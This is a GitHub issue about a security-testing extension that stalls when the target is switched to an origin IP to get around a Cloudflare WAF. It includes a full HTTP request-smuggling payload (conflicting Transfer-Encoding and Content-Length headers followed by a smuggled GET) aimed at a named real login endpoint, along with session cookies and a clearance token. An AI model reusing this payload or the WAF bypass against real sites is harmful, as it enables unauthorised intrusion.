Skip to content

Extension get stuck when traget header is replace with origin IP #81

@abhinavsecond

Description

@abhinavsecond

Hi Team

Extension get stuck after 1 request when I replace target with orgin IP to bypass WAF like cloudflare

For example in the below request I set the target to 174.138.114.138 to bypass WAS and the extension stopped send request after the first request

POST /login HTTP/1.1
Host: manage.nodebb.org
Cookie: _csrf=Z39fo4IpMV3dSc7_AgBl0UdR; connect.sid=s%3ApZgsUDMfFeyfQa7c11AWvaB1HPtPzxds.eUJCR%2FxWCjLceD%2BBQk%2BmFyYReePSctVfbf7T%2FzVagxQ; cf_clearance=WjhRySu7tKucAfkVdu7sKr33mbZWmRc3Dp1SusFNPNA-1760268815-1.2.1.1-9wTyHnJyCEqUpPmREodpL6GEY.R1KEhZJ4EQ7nV8OUv9qvha8bjkgQDRtfJE5YT68NWehZLeX6QjuGv.IvHmyU3uaqqCmjAEcE6OxDWbZVZ05OkWdRlNIVg0WtPmYLaowUDocrrk2dBiUyYIQHWzJotlvAHhifuWwoutz4TDCKFTSPXO0rN_nBcAUd1O9c2VhErMo_m_x43PBylqkGtk54d7WnQ.AqSEQDycM7JgedY; _ga=GA1.2.275020599.1760268815; _gid=GA1.2.617516779.1760268815; _gat=1; _gat_ComboTracker=1; _ga_87JPMD57E1=GS2.2.s1760268815$o1$g0$t1760268815$j60$l0$h0; _ga_J6M59TYKWT=GS2.2.s1760268815$o1$g0$t1760268815$j60$l0$h0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6833.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
fakecontentlength: 119
Origin: null
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="133", "Google Chrome";v="133"
Sec-Ch-Ua-Mobile: ?0
Priority: u=0, i
Te: trailers
Transfer-Encoding: chunked
Content-Length: 159

6c
email=abhinavattacker%2B1%40gmail.com&password=kuduta%40fxzig.com&_csrf=mNeMQBpu-D_Z29C3ZUWjLZQwHQBhDRJJfI4E
0

GET /404 HTTP/1.1
Host: localhost
x: x
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions